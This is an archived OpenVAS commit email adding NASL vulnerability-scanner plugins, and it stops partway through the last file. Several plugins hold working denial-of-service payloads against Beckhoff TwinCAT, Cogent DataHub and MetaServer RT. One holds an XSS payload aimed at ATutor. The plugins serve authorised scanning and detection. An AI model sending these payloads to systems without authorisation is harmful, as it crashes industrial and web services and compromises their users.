[Openvas-commits] r11653 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Sep 22 10:24:09 CEST 2011


Author: veerendragg
Date: 2011-09-22 10:24:03 +0200 (Thu, 22 Sep 2011)
New Revision: 11653

Added:
   trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl
   trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl
   trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl
   trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_ms10-072.nasl
   trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/ChangeLog	2011-09-22 08:24:03 UTC (rev 11653)
@@ -1,3 +1,17 @@
+2011-09-22  Veerendra G.G <veerendragg at secpod.com>,
+
+	* scripts/secpod_atutor_mult_vuln.nasl,
+	scripts/gb_cogent_datahub_integer_overflow_vuln.nasl,
+	scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl,
+	scripts/gb_cogent_datahub_unicode_bof_vuln.nasl,
+	scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl,
+	scripts/gb_cde_rpc_cmsd_service_detect.nasl,
+	scripts/secpod_pentaho_bi_server_mult_vuln.nasl,
+	scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl,
+	scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl,
+	scripts/secpod_ms10-072.nasl:
+	Added new plugins.
+
 2011-09-20 Thomas Reinke <reinke at securityspace.com>
 
 	scripts/CA_License_Service_Stack_Overflow.nasl,

Added: trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,131 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl 17132 2011-09-19 21:20:33Z sep $
+#
+# Beckhoff TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability
+#
+# Authors:
+# Veerendra G.G <veerendragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802036);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49599);
+  script_cve_id("CVE-2011-0514");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Beckhoff TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability");
+  desc = "
+  Overview: This host is installed with Beckhoff TwinCAT and is prone to
+  denial of service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by an error in the 'TCATSysSrv.exe' when performing an
+  invalid read access, which can be exploited by remote attacker by sending
+  malformed packet to port 48899/UDP.
+
+  Impact:
+  Successful exploitation will let the attackers to cause denial of service
+  condition
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Beckhoff TwinCAT Version 2.11 build 1553,Other versions may also be affected.
+
+  Fix: No solution or patch is available as on 20th September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.beckhoff.de/twincat/
+
+  References:
+  http://secunia.com/advisories/45981
+  http://www.exploit-db.com/exploits/17835
+  http://packetstormsecurity.org/files/view/105088
+  http://aluigi.altervista.org/adv/twincat_1-adv.txt
+  http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-06.pdf ";
+
+  script_description(desc);
+  script_summary("Check Beckhoff TwinCAT is vulnerable to DoS");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_require_ports(48899, 48898);
+  exit(0);
+}
+##
+## The script code starts here
+##
+
+## Beckhoff TwinCAT TCP port
+tcp_port = 48898;
+
+## Check tcp port status
+if(!get_port_state(tcp_port)){
+  exit(0);
+}
+
+## Beckhoff TwinCAT UDP port
+udp_port = 48899;
+
+## Check udp port status
+if(!get_udp_port_state(udp_port)){
+  exit(0);
+}
+
+## Confirm Beckhoff TwinCAT other port is running
+## This port also stops listening, if exploit works successfully
+soc = open_sock_tcp(tcp_port);
+if(!soc){
+  exit(0);
+}
+close(soc);
+
+##  Open udp socket
+soc1 = open_sock_udp(udp_port);
+if(!soc1){
+  exit(0);
+}
+
+## Crafted udp packet
+req = raw_string(
+                  0x03, 0x66, 0x14, 0x71, 0x00, 0x00, 0x00, 0x00,
+                  0x06, 0x00, 0x00, 0x00, 0x0a, 0xff, 0xff, 0x02,
+                  0x01, 0x01, 0x10, 0x27,
+                  crap(data:raw_string(0xff), length:1514)
+                );
+
+## send the data
+send(socket:soc1, data:req);
+send(socket:soc1, data:req);
+
+## wait for 7 sec
+sleep(7);
+
+## Confirm Beckhoff TwinCAT Server alive or dead by checking
+## TCP port 48898 as it's hard to detect UDP port status and
+## available function will not work properly
+soc2 = open_sock_tcp(tcp_port);
+if(!soc2)
+{
+  security_hole(udp_port);
+  exit(0);
+}
+close(soc2);

Added: trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cde_rpc_cmsd_service_detect.nasl 16462 2011-09-16 19:14:17 sep $
+#
+# Calendar Manager Service rpc.cmsd Service Detection
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802163);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-1999-0696", "CVE-1999-0320");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Calendar Manager Service rpc.cmsd Service Detection");
+  desc = "
+  Overview: This script detects the running 'rpc.cmsd' service on the host.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in the 'rpc.cmsd' service. If this service
+  is running then disable it as it may become a security issue.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code with
+  the privileges of the rpc.cmsd daemon, typically root. With some
+  configurations rpc.cmsd runs with an effective userid of daemon, while
+  retaining root privileges.
+
+  Impact Level: System
+
+  Fix: No solution or patch is available as on 16th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+
+  Workaround:
+  Disable the rpc.cmsd daemon service.
+
+  References:
+  http://www.cert.org/advisories/CA-99-08-cmsd.html
+  http://www.iss.net/security_center/reference/vuln/sun-cmsd-bo.htm
+  http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9908-102 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Checks the presence of a RPC service 'rpc.cmsd'");
+  script_category(ACT_GATHER_INFO);
+  script_family("RPC");
+  script_dependencies("secpod_rpc_portmap.nasl");
+  script_require_keys("rpc/portmap");
+  exit(0);
+}
+
+include("misc_func.inc");
+
+if(report_paranoia < 2){
+ exit(0);
+}
+
+RPC_PROG = 100068;
+
+## Get the rpc port, running rpc.rquotad service
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+  security_hole(port);
+  exit(0);
+}
+
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
+if(port){
+  security_hole(port);
+  exit(0);
+}
+

Added: trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cogent_datahub_integer_overflow_vuln.nasl 17101 2011-09-22 11:11:11Z sep $
+#
+# Cogent DataHub Integer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802247);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49611);
+  script_cve_id("CVE-2011-3501");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Cogent DataHub Integer Overflow Vulnerability");
+  desc = "
+  Overview: The host is running Cogent DataHub and is prone to integer overflow
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an integer overflow error in the webserver when
+  handling the HTTP 'Content-Length' header can be exploited by sending
+  specially crafted HTTP requests.
+
+  Impact:
+  Successful exploitation may allow remote attackers to allows remote attackers
+  to cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Cogent DataHub 7.1.1.63 and prior.
+
+  Fix: No solution or patch is available as on 22th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.cogentdatahub.com/Products/Cogent_DataHub.html
+
+  References:
+  http://secunia.com/advisories/45967
+  http://aluigi.altervista.org/adv/cogent_3-adv.txt
+  http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-03.pdf ";
+
+  script_description(desc);
+  script_summary("Determine Cogent DataHub Integer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Send and Receive the response
+req = http_get(item:string("/index.asp"),  port:port);
+res = http_send_recv(port:port, data:req);
+
+## Confirm the application
+if("<title>DataHub Web Server</title>" >!< res) {
+  exit(0);
+}
+
+## Construct Attack Request
+attack = string( "POST / HTTP/1.1\r\n",
+                 "Host: localhost\r\n",
+                 "Content-Length: -1\r\n\r\n",
+                 crap(4079));
+
+## Send Attack
+res = http_send_recv(port:port, data:attack);
+
+## Check server is dead or alive
+res = http_send_recv(port:port, data:req);
+if(! res)
+{
+  if(http_is_dead(port:port)) {
+    security_warning(port);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,111 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cogent_datahub_unicode_bof_vuln.nasl 17101 2011-09-22 11:11:11Z sep $
+#
+# Cogent DataHub Unicode Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802246);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49611);
+  script_cve_id("CVE-2011-3493");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Cogent DataHub Unicode Buffer Overflow Vulnerability");
+  desc = "
+  Overview: The host is running Cogent DataHub and is prone to buffer overflow
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a stack based unicode buffer overflow error in the
+  'DH_OneSecondTick' function, which can be exploited by sending specially
+  crafted 'domain', 'report_domain', 'register_datahub', or 'slave' commands.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  within the context of the privileged domain or cause a denial of service
+  condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Cogent DataHub 7.1.1.63 and prior.
+
+  Fix: No solution or patch is available as on 22th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.cogentdatahub.com/Products/Cogent_DataHub.html
+
+  References:
+  http://secunia.com/advisories/45967
+  http://aluigi.altervista.org/adv/cogent_1-adv.txt
+  http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-03.pdf ";
+
+  script_description(desc);
+  script_summary("Determine Cogent DataHub Buffer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("find_service.nes");
+  script_require_ports(4502);
+  exit(0);
+}
+
+
+include("http_func.inc");
+
+## Get Default Port
+port = 4502;
+if(!get_port_state(port)){
+ exit(0);
+}
+
+## Open the socket
+soc = open_sock_tcp(port);
+if(!soc){
+  exit(0);
+}
+
+## Construct Attack Request
+attack =  crap(data: "a", length:512);
+req = string('(domain "', attack, '")', raw_string(0x0a),
+             '(report_domain "', attack, '" 1)', raw_string(0x0a),
+             '(register_datahub "',attack, '")\r\n', raw_string(0x0a),
+             '(slave "', attack, '" flags id1 id2 version secs nsecs)',
+             raw_string(0x0a));
+
+## Sending Attack
+send(socket:soc, data:req);
+send(socket:soc, data:req);
+close(soc);
+
+sleep(5);
+
+## Open the socket and
+## Check server is dead or alive
+soc = open_sock_tcp(port);
+if(!soc){
+  security_hole(port);
+  exit(0);
+}
+close(soc);

Added: trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_libcloud_ssl_cert_sec_bypass_vuln.nasl 17119 2011-09-19 13:23:29Z sep $
+#
+# Libcloud SSL Certificates Security Bypass Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802164);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2010-4340");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Libcloud SSL Certificates Security Bypass Vulnerability");
+  desc = "
+  Overview: This host is installed with Libcloud and is prone to security
+  bypass vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper verification of SSL certificates for
+  HTTPS connections.
+
+  Impact:
+  Successful exploitation will let the attackers to spoof certificates and
+  bypass intended access restrictions via a man-in-the-middle (MITM) attack.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  libcloud version prior to 0.4.1
+
+  Fix: Upgrade to  libcloud version 0.4.1 or later
+  For updates refer, http://libcloud.apache.org/
+
+  References:
+  http://wiki.apache.org/incubator/LibcloudSSL
+  https://issues.apache.org/jira/browse/LIBCLOUD-55
+  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598463 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Libcloud");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  exit(0);
+}
+
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+  exit(0);
+}
+
+## Confirm Linux, as SSH can be installed on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+  exit(0);
+}
+
+## Get the file location
+libName = find_file(file_name:"__init__.py", file_path:"/libcloud/", 
+                            useregex:TRUE, regexpar:"$", sock:sock);
+
+## Check for the each path
+if(libName)
+{
+  foreach binaryName (libName)
+  {
+    ## Get the version
+    libVer = get_bin_version(full_prog_name:"cat", sock:sock,
+                             version_argv:chomp(binaryName),
+                             ver_pattern:"= '([0-9.]+)'");
+    if(libVer[1])
+    {
+      ## Check the version
+      if(version_is_less(version:libVer[1], test_version:"0.4.1"))
+      {
+        security_warning(0);
+        exit(0);
+      }
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,128 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_atutor_mult_vuln.nasl 16586 2011-09-20 19:35:01Z sep $
+#
+# Atutor Multiple Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902728);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49057);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Atutor Multiple Vulnerabilities");
+  desc = "
+  Overview: This host is running Atutor and is prone to information disclosure,
+  SQL injection, and cross site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to an,
+  - Input passed to the 'lang' parameter in '/documentation/index_list.php' is
+    not properly sanitised before being returned to the user.
+  - Input passed to the 'p_course', 'name' and 'value' parameters in
+    '/mods/_standard/social/set_prefs.php' scripts is not properly sanitised
+    before being used in SQL queries.
+  - Input passed via the 'search_friends_HASH' POST parameter, where HASH is
+    the value generated by the 'rand_key' parameter, to the
+    '/mods/_standard/social/index_public.php' script is not properly sanitised
+    before being returned to the user.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary script code
+  or to compromise the application, access or modify data, or exploit latent
+  vulnerabilities in the underlying database.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  ATutor version 2.0.2
+
+  Fix: No solution or patch is available as on 21th September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer,  http://www.atutor.ca/atutor/
+
+  References:
+  http://www.exploit-db.com/exploits/17631/
+  http://securityreason.com/wlb_show/WLB-2011080041
+  http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5037.php
+  http://packetstormsecurity.org/files/view/103765/ZSL-2011-5037.txt ";
+
+  script_description(desc);
+  script_summary("Check if Atutor is vulnerable to Cross Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)) {
+  exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/ATutor", "/atutor", "", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item:string(dir,"/login.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if("ATutor<" >< res)
+  {
+    rand = rand();
+    xss = 'search_friends_' + rand + '=1>"><script>alert(1)</script>&search=' +
+          'Search&rand_key=' + rand;
+    host = get_host_name();
+    filename = string(dir + "/mods/_standard/social/index_public.php");
+
+    ## Construct post request
+    sndReq2 = string( "POST ", filename, " HTTP/1.1\r\n",
+                      "Host: ", host, "\r\n",
+                      "User-Agent: OpenVAs-Agent\r\n",
+                      "Content-Type: application/x-www-form-urlencoded\r\n",
+                      "Content-Length: ", strlen(xss), "\r\n\r\n",
+                       xss);
+
+    ## Check the response to confirm vulnerability
+    rcvRes2 = http_keepalive_send_recv(port:port, data:sndReq2);
+    if('"><script>alert(1)</script>' >< rcvRes2)
+    {
+      security_hole(port);
+      exit(0);
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_metaserver_rt_multiple_dos_vuln.nasl 17305 2011-09-21 15:15:15Z sep $
+#
+# MetaServer RT Multiple Remote Denial of Service Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902569);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49696);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("MetaServer RT Multiple Remote Denial of Service Vulnerabilities");
+  desc = "
+  Overview: The host is running MetaServer RT and is prone to multiple remote
+  denial of service vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to an error when processing certain packets
+  and can be exploited to cause a crash via a specially crafted packet.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  on the system or cause a denial of service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  MetaServer RT version 3.2.1.450 and prior.
+
+  Fix: No solution or patch is available as on 21st September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.traderssoft.com/ts/msrt/
+
+  References:
+  http://secunia.com/advisories/46059
+  http://www.exploit-db.com/exploits/17879/
+  http://aluigi.altervista.org/adv/metaserver_1-adv.txt ";
+
+  script_description(desc);
+  script_summary("Determine if MetaServer RT is prone to denial of service vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("find_service.nes");
+  script_require_ports(2194);
+  exit(0);
+}
+
+
+## Get Default Port
+port = 2194;
+if(!get_port_state(port)){
+ exit(0);
+}
+
+## Open the socket
+soc = open_sock_tcp(port);
+if(!soc){
+  exit(0);
+}
+
+## Construct Attack Request
+req =  crap(data: raw_string(0x80), length:1024);
+
+## Sending Attack
+send(socket:soc, data:req);
+close(soc);
+
+## Waiting
+sleep(3);
+
+## Open the socket and Check server is dead or alive
+soc = open_sock_tcp(port);
+if(!soc)
+{
+  security_hole(port);
+  exit(0);
+}
+
+close(soc);

Added: trunk/openvas-plugins/scripts/secpod_ms10-072.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms10-072.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_ms10-072.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,151 @@
+########i#######################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ms10-072.nasl 11488 2011-09-22 10:40:09Z sep $
+#
+# Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902626);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2010-3243", "CVE-2010-3324");
+  script_bugtraq_id(42467, 43703);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)");
+  desc = "
+  Overview: This host has important security update missing according to
+  Microsoft Bulletin MS10-072.
+
+  Vulnerability Insight:
+  Multiple flaws are due to the way SafeHTML function sanitizes HTML content.
+
+  Impact:
+  Successful exploitation could allow remote attackers to gain sensitie
+  information via a specially crafted script using SafeHTML.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Microsoft Office SharePoint Server 2007 Service Pack 2
+  Microsoft Windows SharePoint Services 3.0 Service Pack 2
+
+  Fix:
+  Run Windows Update and update the listed hotfixes or download and
+  update mentioned hotfixes in the advisory from the below link,
+  http://technet.microsoft.com/en-us/security/bulletin/MS10-072
+
+  References:
+  http://support.microsoft.com/kb/2412048
+  http://technet.microsoft.com/en-us/security/bulletin/MS10-072 ";
+
